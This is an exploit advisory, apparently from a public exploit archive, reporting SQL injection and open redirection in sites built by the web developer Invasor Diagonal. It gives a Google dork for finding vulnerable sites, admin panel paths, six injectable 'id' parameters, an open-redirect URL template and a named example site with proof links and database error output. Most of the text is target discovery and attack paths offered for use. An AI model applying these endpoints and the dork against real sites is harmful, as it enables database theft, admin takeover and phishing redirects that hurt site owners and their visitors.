#################################################################################################
# Exploit Title : Web Development Invasor Diagonal SQL Injection and Open Redirection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/09/2018
# Vendor Homepage : invasordiagonal.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
+ CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
#################################################################################################
# Google Dork :
intext:''web development // invasor diagonal''
# Admin Control Panel Login Path =>
/site_DOMAINNAMEADDRESSHERE_UAT/admin/
/admin/
# SQL Injection Exploits :
/eventos.php?id=[SQL Injection]
/tenistas.php?id=[SQL Injection]
/profesionales_header.php?id=[SQL Injection]
/novedades.php?id=[SQL Injection]
/eventosCorporativos.php?id=[SQL Injection]
/marcas.php?id=[SQL Injection]
# Open Redirection Exploit =>
TARGET/site_DOMAINNAMEADDRESSHERE_UAT/set_language.php?idioma=2&gourl=https://www.REDIRECTIONADDRESSHERE.gov
#################################################################################################
# Example Vulnerable Site => exxiasports.com/eventos.php?id=2%27 => [ Proof of Concept ] => archive.is/b9eAH
# Example Admin Panel Path => exxiasports.com/site_exxia_UAT/admin/ => [ Proof of Concept ] => archive.is/fO8Pi
# Example Open Redirection Vuln Proof of Concept =>
exxiasports.com/site_exxia_UAT/set_language.php?idioma=2&gourl=https://cxsecurity.com => archive.is/7Ay4h
# SQL Database Error =>
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near 'AND Objeto = 'Eventos' AND Destacado = 1 LIMIT 1' at line 1]
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near 'AND Objeto = 'Eventos' AND Extension = 'jpg' AND Destacado = 0
ORDER BY OrdenIma' at line 1]
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near 'AND Objeto = 'Eventos' ORDER BY Orden' at line 1]
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near 'AND Objeto = 'Eventos' AND Extension != 'jpg'
ORDER BY OrdenImagen' at line 1]
Warning: Invalid argument supplied for foreach() in /nfs/c05/h01/mnt/72313/domains/exxiasports.com/html/novedades.php on line 43
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################